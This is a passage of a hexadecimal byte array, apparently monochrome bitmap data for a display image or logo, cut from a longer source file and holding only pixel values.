0X01,0XFF,0X80,0X01,0XFC,0X00,0X0F,0XF0,0X00,0X7F,0XC0,0X00,0XFF,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0XC1,0XFF,0X80,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X00,0XFC,0X00,0X0F,0XF0,0X00,0XFF,0XC0,0X00,0X7F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X7F,0XC1,0XFF,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X00,0XF8,0X00,0X0F,0XF0,0X00,0XFF,0X80,0X00,0X7F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X7F,0XE3,0XFF,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XF0,0XFF,0XFE,0X00,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0XF8,0X00,0X07,0XE0,0X01,0XFF,0X80,0X00,0X3F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X3F,0XE3,0XFE,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XE0,0X7F,0XFF,0X00,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0X78,0X00,0X07,0XE0,0X01,0XFF,0X00,0X00,0X3F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X1F,0XF3,0XFC,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X1F,0XFF,0X80,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0X70,0X00,0X07,0XC0,0X03,0XFF,0X00,0X00,0X1F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X1F,0XFF,0XFC,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X0F,0XFF,0XE0,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X70,0X00,0X03,0XC0,0X03,0XFE,0X00,0X00,0X1F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X0F,0XFF,0XF8,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X03,0XFF,0XF0,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X30,0X00,0X03,0X80,0X03,0XFE,0X00,0X00,0X0F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X0F,0XFF,0XF8,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X01,0XFF,0XFC,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X20,0X00,0X01,0X80,0X07,0XFE,0X00,0X00,0X0F,0XFF,0XC0,0X03,
0XFF,0X00,0X00,0X03,0XFC,0X00,0X00,0X1F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X07,0XFF,0XF0,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X7F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X7F,0XFE,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XF0,0X00,0X20,0X00,0X01,0X80,0X07,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XC0,0X00,0X03,0XFC,0X00,0X00,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X07,0XFF,0XF0,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X03,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X3F,0XFF,0X80,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XF0,0X00,0X00,0X00,0X01,0X00,0X0F,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X03,0XFF,0XE0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X1F,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,0X0E,0XF8,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X03,0XFF,0XE0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X1C,0X78,0X00,0X00,0X03,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X03,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X18,0X70,0X00,0X00,0X03,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X18,0XF0,0X00,0X40,0X01,0XFF,0XC0,0X00,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X7F,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFC,0X00,0X00,0X10,0X00,0X00,0X38,0X80,0X00,0XC0,0X01,0XFF,0XC0,0X00,
0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFE,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X3F,0XFF,0X80,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFC,0X00,0X00,0X18,0X00,0X00,0X31,0X80,0X00,0XE0,0X00,0XFF,0XC0,0X00,
0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X7F,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFC,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X0F,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFE,0X00,0X00,0X18,0X00,0X00,0X71,0X00,0X00,0XE0,0X00,0XFF,0XC0,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X7F,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XF0,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X07,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X38,0X00,0X00,0X63,0X80,0X01,0XF0,0X00,0X7F,0XC0,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X3E,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XC0,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X01,0XFF,0XFC,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X3C,0X00,0X00,0X63,0X00,0X01,0XF0,0X00,0X7F,0XC0,0X00,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X1C,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFC,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X3C,0X00,0X00,0XC3,0X00,0X03,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7C,0X00,0X00,0XC6,0X00,0X03,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7E,0X00,0X00,0XC4,0X00,0X07,0XFC,0X00,0X1F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7E,0X00,0X01,0X84,0X00,0X07,0XFC,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFE,0X00,0X01,0X88,0X00,0X07,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFF,0X00,0X03,0XCC,0X00,0X0F,0XF8,0X00,0X7F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFF,0X00,0X03,0XF8,0X00,0X0F,0XF0,0X00,0X7F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF8,0X00,0X1F,0XF0,0X00,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF0,0X00,0X1F,0XE0,0X00,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF8,0X00,0X3F,0XE0,0X01,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XE0,0X03,0XFF,0XC0,0X0F,0XF8,0X00,0X3F,0XE0,0X01,0XFF,0XC0,0X00,
0X00,0X06,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X1F,0XFF,0XE0,0X03,0XFF,0XC0,0X0F,0XF8,0X00,0X3F,0XC0,0X03,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X1F,0XFF,0XE0,0X07,0XFF,0XC0,0X1F,0XFC,0X00,0X7F,0XC0,0X03,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XF0,0X07,0XFF,0XE0,0X1F,0XFC,0X00,0X7F,0X80,0X07,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XF0,0X07,0XFF,0XE0,0X1F,0XFE,0X00,0XF9,0X80,0X07,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X01,
0XF8,0X07,0X07,0XE0,0X00,0X0F,0XE0,0X40,0X43,0XC0,0X1F,0XE0,0X00,0X00,0X00,0X7F,
0X02,0X08,0X00,0X00,0X00,0X60,0X07,0XF8,0X00,0X0F,0XC0,0X00,0XFF,0X00,0X04,0X1F,
0X80,0X3F,0X00,0X00,0XFF,0X00,0X00,0X01,0XC1,0XF8,0X00,0X03,0XFC,0X18,0X10,0XF8,
0X03,0XF8,0X38,0X40,0X00,0X00,0X01,0X00,0X1F,0XC0,0X81,0X87,0X80,0X3F,0XC0,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XC0,0X03,
0XFE,0X07,0X1F,0XF8,0X00,0X3F,0XF8,0XE0,0XEF,0XC0,0X7F,0XF8,0X00,0X00,0X01,0XFF,
0XC7,0X1C,0X00,0X18,0X00,0X70,0X1F,0XFF,0X00,0X1F,0XF0,0X03,0XFF,0XC0,0X0E,0X7F,
0XE0,0XFF,0XC0,0X03,0XFF,0XC0,0X00,0X01,0XC7,0XFE,0X00,0X0F,0XFF,0X38,0X39,0XF8,
0X0F,0XFE,0X38,0X70,0X00,0X80,0X03,0X80,0X7F,0XF1,0XC1,0XDF,0X80,0XFF,0XF0,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XC0,0X07,
0X9F,0X07,0X7C,0XFC,0X00,0X7E,0X7E,0XE0,0XEE,0X80,0XFC,0XFC,0X00,0X00,0X07,0XE3,
0XE7,0X0E,0X00,0X38,0X00,0XE0,0X3F,0X3F,0XC0,0X3C,0XF8,0X07,0XE7,0XE0,0X0E,0X79,
0XF1,0XF7,0XE0,0X07,0XE7,0XE0,0X00,0X01,0XCF,0X9F,0X00,0X1F,0X9F,0X98,0X3B,0XB0,
0X3F,0X9F,0X38,0X70,0X01,0XC0,0X07,0X01,0XF8,0XF9,0XC1,0XFD,0X01,0XF9,0XF8,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X07,
0X07,0X07,0XF0,0X1C,0X00,0XF0,0X0F,0XE0,0XF8,0X01,0XE0,0X1E,0X00,0X00,0X0F,0X80,
0X7F,0X0E,0X00,0X38,0X00,0XE0,0X78,0X07,0XC0,0X38,0X38,0X0F,0X00,0XF0,0X0F,0XE0,
0X73,0X80,0XE0,0X0F,0X00,0XF0,0X00,0X01,0XFC,0X07,0X80,0X3C,0X03,0XF8,0X3F,0X00,
0X7C,0X03,0XB8,0X70,0X01,0XC0,0X07,0X03,0XE0,0X1D,0XC1,0XF0,0X03,0XC0,0X3C,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X0E,
0X00,0X07,0XC0,0X0E,0X01,0XC0,0X07,0XE0,0XF0,0X03,0XC0,0X07,0X00,0X00,0X1E,0X00,
